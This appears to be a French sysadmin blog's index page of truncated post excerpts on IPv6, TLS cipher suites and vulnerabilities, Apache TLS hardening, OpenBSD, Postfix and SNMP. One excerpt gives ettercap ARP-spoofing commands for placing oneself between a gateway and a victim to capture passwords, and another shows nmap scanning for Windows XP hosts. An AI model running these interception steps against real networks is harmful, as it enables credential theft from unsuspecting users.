Mémo IPv6

Pour voir tous les hôtes actifs sur le lien : $ ping6 -I eth0 ff02::1 Pour voir le routeur : ping6 -I eth0 ff05::2 Pour voir l’adresse de bouclage : $ ping6 ::1 Voir les interfaces : $ ip -6 addr show Configurer manuellement une adresse IPv6 : $ sudo ifconfig eth0 inet6 add 2001:ffff:0:f101::1/64 […]

Les suites cryptographiques

Une suite cryptographique (cipher suite) est une combinaison d’algorithmes permettant l’authentification, le chiffrement et l’intégrité des données ainsi que l’échange de la clé afin d’établir un paramétrage de sécurité pour une connexion réseau utilisant le protocole de communication Transport Layer Security (TLS). Elle est représentée généralement comme ceci : TLS_[Kx_]Au_WITH_En_Mac (exemples : TLS_RSA_WITH_RC4_128_MD5 et TLS_DHE_RSA_WITH_AES_128_CBC_SHA) […]

Vulnérabilités SSL/TLS

Voici quelques vulnérabilités concernant SSL/TLS : article à compléter! Avril 2014 : HEARTBLEED Versions vulnérables : Les versions d’OpenSSL de 1.0.1 à 1.0.1f Impacts : Accès à la mémoire et extraction possible d’information sensible (notamment la clé privée du serveur). La vulnérabilité vient plus précisément de l’implémentation de TLS et DTLS, qui ne gère pas […]

Configurer le chiffrement TLS d’Apache sous Debian

Avec les récentes failles (POODLE, FREAK..) et les recommandations de l’ANSSI, il est important de n’autoriser, dans la mesure du possible, uniquement que TLSv1.1 et TLSv1.2. Voici un document très intéressant présentant un état des lieux des récommandations : http://www.ssi.gouv.fr/uploads/IMG/pdf/SSL_TLS_etat_des_lieux_et_recommandations.pdf Comment configurer (au mieux?) Apache pour Debian Squeeze LTS, Debian Wheezy et Debian Jessie? L’installation […]

Faire de l’ARP spoofing ou ARP poisoning

Il est très simple, sur le même segment réseau, de se faire passer pour la passerelle… On active l’IP forwarding : $ sudo sysctl -w net.ipv4.ip_forward=1 On lance ettercap : $ sudo ettercap -T -M arp /@IP_PASSERELLE/ /@IP_VICTIME/ Enfin on écoute le réseau avec un outil qui nous affichera les mots de passe transitant en […]

Traquer Windows XP avec nmap…

… avec l’utilisation des scripts nmap smb-os-discovery.nse et smb-system-info.nse On lance nmap (ici depuis la distribution kali-linux) afin de scanner notre plage IP : root@kali# cd /usr/share/nmap root@kali:/usr/share/nmap# nmap -sV –script=scripts/smb-os-discovery.nse,scripts/smb-system-info.nse 192.168.0.0/24 Starting Nmap 6.25 ( http://nmap.org ) at 2014-11-21 10:04 CET … Nmap scan report for 192.168.0.53 Host is up (0.0011s latency). Not shown: […]

OpenBSD 5.4, WordPress et Nginx

Voici comment installer WordPress sur OpenBSD. Pour installer un package, on renseigne la variable PKG_PATH : $ sudo export PKG_PATH=ftp://ftp.openbsd.org/pub/OpenBSD/5.4/packages/amd64/ On installe php-fpm qui ajoutera les dépendances (notamment php-5.3.27) : $ sudo pkg_add php-fpm Ambiguous: choose dependency for php-fpm-5.3.27: a 0: php-5.3.27 1: php-5.3.27 Your choice: 1 php-fpm-5.3.27:libiconv-1.14p0: ok php-fpm-5.3.27:libxml-2.9.0p0: ok php-fpm-5.3.27:gettext-0.18.2p3: ok php-fpm-5.3.27:femail-0.98: ok […]

[Debian Wheezy] Spamassassin prend son temps! avec un DNSBL qui ne répond plus…

Après une installation classique d’un serveur SMTP (sur une Wheezy avec les paquets actuels) avec (donc) Postfix 2.9.6-2, Amavis-new 1:2.7.1-2, Clamav 0.97.8+dfsg-1 et Spamassassin 3.3.2 (+pyzor/razo2/DCC), je me rends compte que les messages mettent plus de 4 secondes avant d’être délivrés (de façon asynchrone tout de même).. En mode Debug on peut voir les pourcentages […]

[Debian Wheezy] Surveille ta mailq!

Voici comment superviser simplement la mailq de votre serveur SMTP (Postix par exemple). Installer le serveur snmp : apt-get install snmpd Rajouter dans /etc/snmp/snmpd.conf (w.x.y.z est l’IP du serveur de supervision) les 2 lignes suivantes : rocommunity public w.x.y.z extend mailqstats /etc/snmp/mailqstats.sh Vous pouvez changer le community « public » pour un tout autre nom… Créer le […]

[BSD] invité OpenBSD 5.4 sur un hôte KVM

Création du volume logique : # lvcreate -n musclor -L50G virtvol Logical volume « musclor » created Téléchargement de l’ISO : # cd /isos/ # wget http://mirrors.ircam.fr/pub/OpenBSD/5.4/amd64/install54.iso Installation avec virt-install : # virt-install –name=musclor –ram=4096 –vcpus=2 –disk path=/dev/virtvol/musclor,bus=virtio –vnc –cdrom=/isos/install54.iso –os-type=unix –os-variant=openbsd4 –network=bridge:br0,model=virtio –hvm –keymap=fr Attention : pour bénéficier de virtio, il est indispensable de l’indiquer explicitement! Pour […]